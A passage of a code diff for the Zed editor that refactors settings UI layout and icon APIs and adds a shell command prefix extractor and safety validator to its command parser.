.child( + ButtonLink::new(button_link_label, dashboard_url) + .no_icon(true) + .label_size(LabelSize::Small) + .label_color(Color::Muted), + ) + .child( + Label::new("to generate an API key.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + }; let configured_card_label = if is_from_env_var { "API Key Set in Environment Variable" } else { @@ -257,10 +291,12 @@ fn render_api_key_provider( h_flex() .pt_2p5() .w_full() + .min_w_0() .justify_between() .child( v_flex() .w_full() + .min_w_0() .max_w_1_2() .child(Label::new("API Key")) .child(description) @@ -297,39 +333,6 @@ fn render_api_key_provider( }) } -fn sweep_settings() -> Box<[SettingsPageItem]> { - Box::new([SettingsPageItem::SettingItem(SettingItem { - title: "Privacy Mode", - description: "When enabled, Sweep will not store edit prediction inputs or outputs. When disabled, Sweep may collect data including buffer contents, diagnostics, file paths, and generated predictions to improve the service.", - field: Box::new(SettingField { - pick: |settings| { - settings - .project - .all_languages - .edit_predictions - .as_ref()? - .sweep - .as_ref()? - .privacy_mode - .as_ref() - }, - write: |settings, value| { - settings - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .sweep - .get_or_insert_default() - .privacy_mode = value; - }, - json_path: Some("edit_predictions.sweep.privacy_mode"), - }), - metadata: None, - files: USER, - })]) -} - fn render_ollama_provider( settings_window: &SettingsWindow, window: &mut Window, @@ -423,7 +426,7 @@ fn ollama_settings() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Prompt Format", - description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name", + description: "The prompt format to use when requesting predictions. 
Set to Infer to have the format inferred based on the model name.", field: Box::new(SettingField { pick: |settings| { settings @@ -484,34 +487,6 @@ fn ollama_settings() -> Box<[SettingsPageItem]> { ]) } -fn render_open_ai_compatible_provider( - settings_window: &SettingsWindow, - window: &mut Window, - cx: &mut Context, -) -> impl IntoElement { - let open_ai_compatible_settings = open_ai_compatible_settings(); - let additional_fields = settings_window - .render_sub_page_items_section( - open_ai_compatible_settings.iter().enumerate(), - true, - window, - cx, - ) - .into_any_element(); - - v_flex() - .id("open-ai-compatible") - .min_w_0() - .pt_8() - .gap_1p5() - .child( - SettingsSectionHeader::new("OpenAI Compatible API") - .icon(IconName::AiOpenAiCompat) - .no_padding(true), - ) - .child(div().px_neg_8().child(additional_fields)) -} - fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> { Box::new([ SettingsPageItem::SettingItem(SettingItem { @@ -582,7 +557,7 @@ fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Prompt Format", - description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name", + description: "The prompt format to use when requesting predictions. 
Set to Infer to have the format inferred based on the model name.", field: Box::new(SettingField { pick: |settings| { settings @@ -748,12 +723,9 @@ fn render_github_copilot_provider(window: &mut Window, cx: &mut App) -> Option AnyEl h_flex() .my_4() + .min_w_0() .justify_between() .child( v_flex() + .w_full() + .min_w_0() .child(Label::new("Default Permission")) .child( Label::new( @@ -1090,9 +1097,7 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronDown) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small), + .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)), ) .menu(move |window, cx| { Some(ContextMenu::build(window, cx, move |menu, _, _| { @@ -1126,13 +1131,18 @@ fn render_default_mode_section( let tool_id_owned = tool_id.to_string(); h_flex() + .min_w_0() .justify_between() .child( - v_flex().child(Label::new("Default Action")).child( - Label::new("Action to take when no patterns match.") - .size(LabelSize::Small) - .color(Color::Muted), - ), + v_flex() + .w_full() + .min_w_0() + .child(Label::new("Default Action")) + .child( + Label::new("Action to take when no patterns match.") + .size(LabelSize::Small) + .color(Color::Muted), + ), ) .child( PopoverMenu::new(format!("default-mode-{}", tool_id)) @@ -1141,9 +1151,7 @@ fn render_default_mode_section( .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronDown) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small), + .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)), ) .menu(move |window, cx| { let tool_id = tool_id_owned.clone(); @@ -1413,6 +1421,9 @@ mod tests { // Subagent permission checks happen at the level of individual // tool calls within the subagent, not at the spawning level. 
"spawn_agent", + // update_plan updates UI-visible planning state but does not use + // tool permission rules. + "update_plan", ]; let tool_info_ids: Vec<&str> = TOOLS.iter().map(|t| t.id).collect(); diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index 9ac338f7b849a53c402a0cea6b79ddc6496df0f2..4c7a98f6c0fa94e659a6db4e00aa28e2b4516e13 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -33,7 +33,7 @@ use std::{ sync::{Arc, LazyLock, RwLock}, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Banner, ContextMenu, Divider, DropdownMenu, DropdownStyle, IconButtonShape, KeyBinding, KeybindingHint, PopoverMenu, Scrollbars, Switch, Tooltip, TreeViewItem, WithScrollbar, @@ -392,29 +392,22 @@ pub fn init(cx: &mut App) { let queue = ProjectSettingsUpdateQueue::new(cx); cx.set_global(queue); + cx.on_action(|_: &OpenSettings, cx| { + open_settings_editor(None, None, None, cx); + }); + cx.observe_new(|workspace: &mut workspace::Workspace, _, _| { workspace - .register_action( - |workspace, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); - open_settings_editor(workspace, Some(&path), None, window_handle, cx); - }, - ) - .register_action(|workspace, _: &OpenSettings, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); - open_settings_editor(workspace, None, None, window_handle, cx); + .register_action(|_, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| { + let window_handle = window.window_handle().downcast::(); + open_settings_editor(Some(&path), None, window_handle, cx); + }) + .register_action(|_, _: &OpenSettings, window, cx| { + let window_handle = window.window_handle().downcast::(); + open_settings_editor(None, None, window_handle, cx); }) 
.register_action(|workspace, _: &OpenProjectSettings, window, cx| { - let window_handle = window - .window_handle() - .downcast::() - .expect("Workspaces are root Windows"); + let window_handle = window.window_handle().downcast::(); let target_worktree_id = workspace .project() .read(cx) @@ -425,7 +418,7 @@ pub fn init(cx: &mut App) { .is_dir() .then_some(tree.read(cx).id()) }); - open_settings_editor(workspace, None, target_worktree_id, window_handle, cx); + open_settings_editor(None, target_worktree_id, window_handle, cx); }); }) .detach(); @@ -474,6 +467,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -506,18 +500,18 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::>(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) - .add_basic_renderer::(render_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::>(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + 
.add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) + .add_basic_renderer::(render_editable_number_field) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -529,7 +523,9 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) @@ -551,6 +547,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_editable_number_field) .add_basic_renderer::(render_ollama_model_picker) .add_basic_renderer::(render_dropdown) @@ -563,10 +560,9 @@ fn init_renderers(cx: &mut App) { } pub fn open_settings_editor( - _workspace: &mut Workspace, path: Option<&str>, target_worktree_id: Option, - workspace_handle: WindowHandle, + workspace_handle: Option>, cx: &mut App, ) { telemetry::event!("Settings Viewed"); @@ -623,7 +619,8 @@ pub fn open_settings_editor( if let Some(existing_window) = existing_window { existing_window .update(cx, |settings_window, window, cx| { - settings_window.original_window = Some(workspace_handle); + settings_window.original_window = workspace_handle; + window.activate_window(); if let Some(path) = path { open_path(path, settings_window, window, cx); @@ -644,7 +641,9 @@ pub fn open_settings_editor( // We have to defer this to get the workspace off the stack. 
let path = path.map(ToOwned::to_owned); cx.defer(move |cx| { - let current_rem_size: f32 = theme::ThemeSettings::get_global(cx).ui_font_size(cx).into(); + let current_rem_size: f32 = theme_settings::ThemeSettings::get_global(cx) + .ui_font_size(cx) + .into(); let default_bounds = DEFAULT_ADDITIONAL_WINDOW_SIZE; let default_rem_size = 16.0; @@ -684,7 +683,7 @@ pub fn open_settings_editor( }, |window, cx| { let settings_window = - cx.new(|cx| SettingsWindow::new(Some(workspace_handle), window, cx)); + cx.new(|cx| SettingsWindow::new(workspace_handle, window, cx)); settings_window.update(cx, |settings_window, cx| { if let Some(path) = path { open_path(&path, settings_window, window, cx); @@ -924,9 +923,7 @@ impl SettingsPageItem { Button::new("error-warning", warning) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(Some(IconName::Debug)) - .icon_position(IconPosition::Start) - .icon_color(Color::Error) + .start_icon(Icon::new(IconName::Debug).color(Color::Error)) .tab_index(0_isize) .tooltip(Tooltip::text(setting_item.field.type_name())) .into_any_element(), @@ -991,11 +988,12 @@ impl SettingsPageItem { ("sub-page".into(), sub_page_link.title.clone()), "Configure", ) - .icon(IconName::ChevronRight) .tab_index(0_isize) - .icon_position(IconPosition::End) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ChevronRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .style(ButtonStyle::OutlinedGhost) .size(ButtonSize::Medium) .on_click({ @@ -1124,11 +1122,12 @@ impl SettingsPageItem { ("action-link".into(), action_link.title.clone()), action_link.button_text.clone(), ) - .icon(IconName::ArrowUpRight) .tab_index(0_isize) - .icon_position(IconPosition::End) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .style(ButtonStyle::OutlinedGhost) .size(ButtonSize::Medium) .on_click({ @@ -1397,17 +1396,14 @@ 
impl PartialEq for ActionLink { } fn all_language_names(cx: &App) -> Vec { - workspace::AppState::global(cx) - .upgrade() - .map_or(vec![], |state| { - state - .languages - .language_names() - .into_iter() - .filter(|name| name.as_ref() != "Zed Keybind Context") - .map(Into::into) - .collect() - }) + let state = workspace::AppState::global(cx); + state + .languages + .language_names() + .into_iter() + .filter(|name| name.as_ref() != "Zed Keybind Context") + .map(Into::into) + .collect() } #[allow(unused)] @@ -1521,7 +1517,7 @@ impl SettingsWindow { }) .detach(); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if let Some(existing_window) = cx .windows() .into_iter() @@ -1538,29 +1534,26 @@ impl SettingsWindow { }) .detach(); - if let Some(app_state) = AppState::global(cx).upgrade() { - let workspaces: Vec> = app_state - .workspace_store - .read(cx) - .workspaces() - .filter_map(|weak| weak.upgrade()) - .collect(); + let app_state = AppState::global(cx); + let workspaces: Vec> = app_state + .workspace_store + .read(cx) + .workspaces() + .filter_map(|weak| weak.upgrade()) + .collect(); - for workspace in workspaces { - let project = workspace.read(cx).project().clone(); - cx.observe_release_in(&project, window, |this, _, window, cx| { - this.fetch_files(window, cx) - }) - .detach(); - cx.subscribe_in(&project, window, Self::handle_project_event) - .detach(); - cx.observe_release_in(&workspace, window, |this, _, window, cx| { - this.fetch_files(window, cx) - }) + for workspace in workspaces { + let project = workspace.read(cx).project().clone(); + cx.observe_release_in(&project, window, |this, _, window, cx| { + this.fetch_files(window, cx) + }) + .detach(); + cx.subscribe_in(&project, window, Self::handle_project_event) .detach(); - } - } else { - log::error!("App state doesn't exist when creating a new settings window"); + cx.observe_release_in(&workspace, window, |this, _, window, cx| { + this.fetch_files(window, cx) + }) + .detach(); } let 
this_weak = cx.weak_entity(); @@ -1574,8 +1567,10 @@ impl SettingsWindow { }; this_weak - .update(cx, |this, cx| { - this.fetch_files(window, cx); + .update(cx, |_, cx| { + cx.defer_in(window, |settings_window, window, cx| { + settings_window.fetch_files(window, cx) + }); cx.observe_release_in(&project, window, |_, _, window, cx| { cx.defer_in(window, |this, window, cx| this.fetch_files(window, cx)); }) @@ -2188,37 +2183,39 @@ impl SettingsWindow { ui_files.reverse(); - let mut missing_worktrees = Vec::new(); + if self.original_window.is_some() { + let mut missing_worktrees = Vec::new(); - for worktree in all_projects(self.original_window.as_ref(), cx) - .flat_map(|project| project.read(cx).visible_worktrees(cx)) - .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id())) - { - let worktree = worktree.read(cx); - let worktree_id = worktree.id(); - let Some(directory_name) = worktree.root_dir().and_then(|file| { - file.file_name() - .map(|os_string| os_string.to_string_lossy().to_string()) - }) else { - continue; - }; + for worktree in all_projects(self.original_window.as_ref(), cx) + .flat_map(|project| project.read(cx).visible_worktrees(cx)) + .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id())) + { + let worktree = worktree.read(cx); + let worktree_id = worktree.id(); + let Some(directory_name) = worktree.root_dir().and_then(|file| { + file.file_name() + .map(|os_string| os_string.to_string_lossy().to_string()) + }) else { + continue; + }; - missing_worktrees.push((worktree_id, directory_name.clone())); - let path = RelPath::empty().to_owned().into_arc(); + missing_worktrees.push((worktree_id, directory_name.clone())); + let path = RelPath::empty().to_owned().into_arc(); - let settings_ui_file = SettingsUiFile::Project((worktree_id, path)); + let settings_ui_file = SettingsUiFile::Project((worktree_id, path)); - let focus_handle = prev_files - .iter() - .find_map(|(prev_file, handle)| { - (prev_file == 
&settings_ui_file).then(|| handle.clone()) - }) - .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true)); + let focus_handle = prev_files + .iter() + .find_map(|(prev_file, handle)| { + (prev_file == &settings_ui_file).then(|| handle.clone()) + }) + .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true)); - ui_files.push((settings_ui_file, focus_handle)); - } + ui_files.push((settings_ui_file, focus_handle)); + } - self.worktree_root_dirs.extend(missing_worktrees); + self.worktree_root_dirs.extend(missing_worktrees); + } self.files = ui_files; let current_file_still_exists = self @@ -2880,7 +2877,7 @@ impl SettingsWindow { } fn render_sub_page_breadcrumbs(&self) -> impl IntoElement { - h_flex().gap_1().children( + h_flex().min_w_0().gap_1().overflow_x_hidden().children( itertools::intersperse( std::iter::once(self.current_page().title.into()).chain( self.sub_page_stack @@ -3110,9 +3107,11 @@ impl SettingsWindow { if let Some(current_sub_page) = self.sub_page_stack.last() { page_header = h_flex() .w_full() + .min_w_0() .justify_between() .child( h_flex() + .min_w_0() .ml_neg_1p5() .gap_1() .child( @@ -3127,17 +3126,19 @@ impl SettingsWindow { ) .when(current_sub_page.link.in_json, |this| { this.child( - Button::new("open-in-settings-file", "Edit in settings.json") - .tab_index(0_isize) - .style(ButtonStyle::OutlinedGhost) - .tooltip(Tooltip::for_action_title_in( - "Edit in settings.json", - &OpenCurrentFile, - &self.focus_handle, - )) - .on_click(cx.listener(|this, _, window, cx| { - this.open_current_settings_file(window, cx); - })), + div().flex_shrink_0().child( + Button::new("open-in-settings-file", "Edit in settings.json") + .tab_index(0_isize) + .style(ButtonStyle::OutlinedGhost) + .tooltip(Tooltip::for_action_title_in( + "Edit in settings.json", + &OpenCurrentFile, + &self.focus_handle, + )) + .on_click(cx.listener(|this, _, window, cx| { + this.open_current_settings_file(window, cx); + })), + ), ) }) .into_any_element(); @@ -3307,6 
+3308,7 @@ impl SettingsWindow { .pt_6() .gap_4() .flex_1() + .min_w_0() .bg(cx.theme().colors().editor_background) .child( v_flex() @@ -3356,9 +3358,7 @@ impl SettingsWindow { } SettingsUiFile::Project((worktree_id, path)) => { let settings_path = path.join(paths::local_settings_file_relative_path()); - let Some(app_state) = workspace::AppState::global(cx).upgrade() else { - return; - }; + let app_state = workspace::AppState::global(cx); let Some((workspace_window, worktree, corresponding_workspace)) = app_state .workspace_store @@ -3646,7 +3646,7 @@ impl SettingsWindow { impl Render for SettingsWindow { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); client_side_decorations( v_flex() @@ -3739,31 +3739,25 @@ fn all_projects( cx: &App, ) -> impl Iterator> { let mut seen_project_ids = std::collections::HashSet::new(); - workspace::AppState::global(cx) - .upgrade() - .map(|app_state| { - app_state - .workspace_store - .read(cx) - .workspaces() - .filter_map(|weak| weak.upgrade()) - .map(|workspace: Entity| workspace.read(cx).project().clone()) - .chain( - window - .and_then(|handle| handle.read(cx).ok()) - .into_iter() - .flat_map(|multi_workspace| { - multi_workspace - .workspaces() - .iter() - .map(|workspace| workspace.read(cx).project().clone()) - .collect::>() - }), - ) - .filter(move |project| seen_project_ids.insert(project.entity_id())) - }) - .into_iter() - .flatten() + let app_state = workspace::AppState::global(cx); + app_state + .workspace_store + .read(cx) + .workspaces() + .filter_map(|weak| weak.upgrade()) + .map(|workspace: Entity| workspace.read(cx).project().clone()) + .chain( + window + .and_then(|handle| handle.read(cx).ok()) + .into_iter() + .flat_map(|multi_workspace| { + multi_workspace + .workspaces() + .map(|workspace| workspace.read(cx).project().clone()) + .collect::>() + }), + ) + .filter(move 
|project| seen_project_ids.insert(project.entity_id())) } fn open_user_settings_in_workspace( @@ -3938,10 +3932,13 @@ impl ProjectSettingsUpdateQueue { buffer.update(cx, |buffer, cx| { let current_text = buffer.text(); - let new_text = cx + if let Some(new_text) = cx .global::() - .new_text_for_update(current_text, |settings| update(settings, cx)); - buffer.edit([(0..buffer.len(), new_text)], None, cx); + .new_text_for_update(current_text, |settings| update(settings, cx)) + .log_err() + { + buffer.edit([(0..buffer.len(), new_text)], None, cx); + } }); buffer_store @@ -4053,41 +4050,6 @@ fn render_toggle_button + From + Copy>( .into_any_element() } -fn render_number_field( - field: SettingField, - file: SettingsUiFile, - _metadata: Option<&SettingsFieldMetadata>, - window: &mut Window, - cx: &mut App, -) -> AnyElement { - let (_, value) = SettingsStore::global(cx).get_value_from_file(file.to_settings(), field.pick); - let value = value.copied().unwrap_or_else(T::min_value); - - let id = field - .json_path - .map(|p| format!("numeric_stepper_{}", p)) - .unwrap_or_else(|| "numeric_stepper".to_string()); - - NumberField::new(id, value, window, cx) - .tab_index(0_isize) - .on_change({ - move |value, window, cx| { - let value = *value; - update_settings_file( - file.clone(), - field.json_path, - window, - cx, - move |settings, _cx| { - (field.write)(settings, Some(value)); - }, - ) - .log_err(); // todo(settings_ui) don't log err - } - }) - .into_any_element() -} - fn render_editable_number_field( field: SettingField, file: SettingsUiFile, @@ -4171,10 +4133,11 @@ fn render_picker_trigger_button(id: SharedString, label: SharedString) -> Button .tab_index(0_isize) .style(ButtonStyle::Outlined) .size(ButtonSize::Medium) - .icon(IconName::ChevronUpDown) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ChevronUpDown) + .size(IconSize::Small) + .color(Color::Muted), + ) } fn render_font_picker( @@ 
-4405,7 +4368,7 @@ pub mod test { pub fn register_settings(cx: &mut App) { settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); menu::init(); } @@ -4716,7 +4679,7 @@ pub mod test { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state }); @@ -4890,7 +4853,7 @@ pub mod test { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state }); @@ -5070,7 +5033,7 @@ mod project_settings_update_tests { cx.update(|cx| { let store = settings::SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); menu::init(); let queue = ProjectSettingsUpdateQueue::new(cx); diff --git a/crates/shell_command_parser/src/shell_command_parser.rs b/crates/shell_command_parser/src/shell_command_parser.rs index acfd656787c301d9f7ad61e6a14a052b3bc2924c..2ab42dd36bb10c3ed4a624d4a7196174cff6a141 100644 --- a/crates/shell_command_parser/src/shell_command_parser.rs +++ b/crates/shell_command_parser/src/shell_command_parser.rs @@ -1,8 +1,25 @@ use brush_parser::ast; +use brush_parser::ast::SourceLocation; use brush_parser::word::WordPiece; use brush_parser::{Parser, ParserOptions, SourceInfo}; use std::io::BufReader; +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct TerminalCommandPrefix { + pub normalized: String, + pub display: String, + pub tokens: Vec, + pub command: String, + pub subcommand: Option, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum TerminalCommandValidation { + Safe, + Unsafe, + Unsupported, +} + pub fn extract_commands(command: &str) -> Option> { let reader = BufReader::new(command.as_bytes()); let options = 
ParserOptions::default(); @@ -17,6 +34,444 @@ pub fn extract_commands(command: &str) -> Option> { Some(commands) } +pub fn extract_terminal_command_prefix(command: &str) -> Option { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = parser.parse_program().ok()?; + let simple_command = first_simple_command(&program)?; + + let mut normalized_tokens = Vec::new(); + let mut display_start = None; + let mut display_end = None; + + if let Some(prefix) = &simple_command.prefix { + for item in &prefix.0 { + if let ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) = item { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + normalized_tokens.push(normalized_assignment); + update_display_bounds(&mut display_start, &mut display_end, word); + } + NormalizedAssignment::Skipped => {} + } + } + } + } + + let command_word = simple_command.word_or_name.as_ref()?; + let command_name = normalize_word(command_word)?; + normalized_tokens.push(command_name.clone()); + update_display_bounds(&mut display_start, &mut display_end, command_word); + + let mut subcommand = None; + if let Some(suffix) = &simple_command.suffix { + for item in &suffix.0 { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(_) => continue, + ast::CommandPrefixOrSuffixItem::Word(word) => { + let normalized_word = normalize_word(word)?; + if !normalized_word.starts_with('-') { + subcommand = Some(normalized_word.clone()); + normalized_tokens.push(normalized_word); + update_display_bounds(&mut display_start, &mut display_end, word); + } + break; + } + _ => break, + } + } + } + + let start = display_start?; + let end = display_end?; + let display = command.get(start..end)?.to_string(); + + Some(TerminalCommandPrefix { + normalized: 
normalized_tokens.join(" "), + display, + tokens: normalized_tokens, + command: command_name, + subcommand, + }) +} + +pub fn validate_terminal_command(command: &str) -> TerminalCommandValidation { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = match parser.parse_program() { + Ok(program) => program, + Err(_) => return TerminalCommandValidation::Unsupported, + }; + + match program_validation(&program) { + TerminalProgramValidation::Safe => TerminalCommandValidation::Safe, + TerminalProgramValidation::Unsafe => TerminalCommandValidation::Unsafe, + TerminalProgramValidation::Unsupported => TerminalCommandValidation::Unsupported, + } +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum TerminalProgramValidation { + Safe, + Unsafe, + Unsupported, +} + +fn first_simple_command(program: &ast::Program) -> Option<&ast::SimpleCommand> { + let complete_command = program.complete_commands.first()?; + let compound_list_item = complete_command.0.first()?; + let command = compound_list_item.0.first.seq.first()?; + + match command { + ast::Command::Simple(simple_command) => Some(simple_command), + _ => None, + } +} + +fn update_display_bounds(start: &mut Option, end: &mut Option, word: &ast::Word) { + if let Some(location) = word.location() { + let word_start = location.start.index; + let word_end = location.end.index; + *start = Some(start.map_or(word_start, |current| current.min(word_start))); + *end = Some(end.map_or(word_end, |current| current.max(word_end))); + } +} + +enum NormalizedAssignment { + Included(String), + Skipped, +} + +fn normalize_assignment_for_command_prefix( + assignment: &ast::Assignment, + word: &ast::Word, +) -> Option { + let operator = if assignment.append { "+=" } else { "=" }; + let assignment_prefix = format!("{}{}", assignment.name, operator); + + match &assignment.value { + 
ast::AssignmentValue::Scalar(value) => { + let normalized_value = normalize_word(value)?; + let raw_value = word.value.strip_prefix(&assignment_prefix)?; + let rendered_value = if shell_value_requires_quoting(&normalized_value) { + raw_value.to_string() + } else { + normalized_value + }; + + Some(NormalizedAssignment::Included(format!( + "{assignment_prefix}{rendered_value}" + ))) + } + ast::AssignmentValue::Array(_) => Some(NormalizedAssignment::Skipped), + } +} + +fn shell_value_requires_quoting(value: &str) -> bool { + value.chars().any(|character| { + character.is_whitespace() + || !matches!( + character, + 'a'..='z' + | 'A'..='Z' + | '0'..='9' + | '_' + | '@' + | '%' + | '+' + | '=' + | ':' + | ',' + | '.' + | '/' + | '-' + ) + }) +} + +fn program_validation(program: &ast::Program) -> TerminalProgramValidation { + combine_validations( + program + .complete_commands + .iter() + .map(compound_list_validation), + ) +} + +fn compound_list_validation(compound_list: &ast::CompoundList) -> TerminalProgramValidation { + combine_validations( + compound_list + .0 + .iter() + .map(|item| and_or_list_validation(&item.0)), + ) +} + +fn and_or_list_validation(and_or_list: &ast::AndOrList) -> TerminalProgramValidation { + combine_validations( + std::iter::once(pipeline_validation(&and_or_list.first)).chain( + and_or_list.additional.iter().map(|and_or| match and_or { + ast::AndOr::And(pipeline) | ast::AndOr::Or(pipeline) => { + pipeline_validation(pipeline) + } + }), + ), + ) +} + +fn pipeline_validation(pipeline: &ast::Pipeline) -> TerminalProgramValidation { + combine_validations(pipeline.seq.iter().map(command_validation)) +} + +fn command_validation(command: &ast::Command) -> TerminalProgramValidation { + match command { + ast::Command::Simple(simple_command) => simple_command_validation(simple_command), + ast::Command::Compound(compound_command, redirect_list) => combine_validations( + std::iter::once(compound_command_validation(compound_command)) + 
.chain(redirect_list.iter().map(redirect_list_validation)), + ), + ast::Command::Function(function_definition) => { + function_body_validation(&function_definition.body) + } + ast::Command::ExtendedTest(test_expr) => extended_test_expr_validation(test_expr), + } +} + +fn simple_command_validation(simple_command: &ast::SimpleCommand) -> TerminalProgramValidation { + combine_validations( + simple_command + .prefix + .iter() + .map(command_prefix_validation) + .chain(simple_command.word_or_name.iter().map(word_validation)) + .chain(simple_command.suffix.iter().map(command_suffix_validation)), + ) +} + +fn command_prefix_validation(prefix: &ast::CommandPrefix) -> TerminalProgramValidation { + combine_validations(prefix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn command_suffix_validation(suffix: &ast::CommandSuffix) -> TerminalProgramValidation { + combine_validations(suffix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn prefix_or_suffix_item_validation( + item: &ast::CommandPrefixOrSuffixItem, +) -> TerminalProgramValidation { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => io_redirect_validation(redirect), + ast::CommandPrefixOrSuffixItem::Word(word) => word_validation(word), + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + combine_validations([assignment_validation(assignment), word_validation(word)]) + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + } +} + +fn io_redirect_validation(redirect: &ast::IoRedirect) -> TerminalProgramValidation { + match redirect { + ast::IoRedirect::File(_, _, target) => match target { + ast::IoFileRedirectTarget::Filename(word) => word_validation(word), + ast::IoFileRedirectTarget::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + _ => TerminalProgramValidation::Safe, + }, + ast::IoRedirect::HereDocument(_, here_doc) => { + if here_doc.requires_expansion { + 
